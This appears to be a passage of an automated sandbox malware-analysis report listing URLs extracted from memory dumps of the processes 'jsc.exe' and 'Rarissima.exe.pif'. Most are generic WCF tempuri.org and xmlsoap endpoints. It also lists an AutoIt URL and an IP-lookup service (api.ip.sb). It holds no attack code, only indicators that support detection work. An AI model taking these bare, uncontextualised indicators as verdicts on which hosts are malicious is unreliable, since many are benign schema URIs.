                                    http://tempuri.org/Entity/Id19LRjsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://tempuri.org/Entity/Id23Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/Entity/Id17LRjsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://tempuri.org/Entity/Id15LRjsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://tempuri.org/Entity/Id9LRjsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://tempuri.org/Entity/Id19Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://tempuri.org/Entity/Id13LRjsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://tempuri.org/Entity/Id7LRjsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://tempuri.org/Entity/Id11LRjsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsejsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/faultjsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://tempuri.org/Entity/Id17Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://tempuri.org/Entity/Id1LRjsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencejsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://tempuri.org/Entity/Id5LRjsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://tempuri.org/Entity/Id20Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://tempuri.org/Entity/Id3LRjsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Entity/Id15Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://tempuri.org/Entity/Id13Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/Entity/Id4Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://tempuri.org/(jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://tempuri.org/Entity/Id6Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.autoitscript.com/autoit3/JRarissima.exe.pif, 0000000A.00000000.1174784742.0000000000A19000.00000002.00000001.01000000.00000006.sdmp, Dici.tmp.0.dr, Rarissima.exe.pif.4.drfalse
                                                                                  high
                                                                                  https://api.ip.sb/ipRarissima.exe.pif, 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementjsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://tempuri.org/Entity/Id23LRjsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://tempuri.org/Entity/Id7Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://tempuri.org/Entity/Id21LRjsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousjsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://tempuri.org/Entity/Id11Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://tempuri.org/Entity/Id9Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://tempuri.org/Entity/(jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://tempuri.org/Entity/Id22Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://tempuri.org/Entity/Id24Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://tempuri.org/Entity/Id1Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
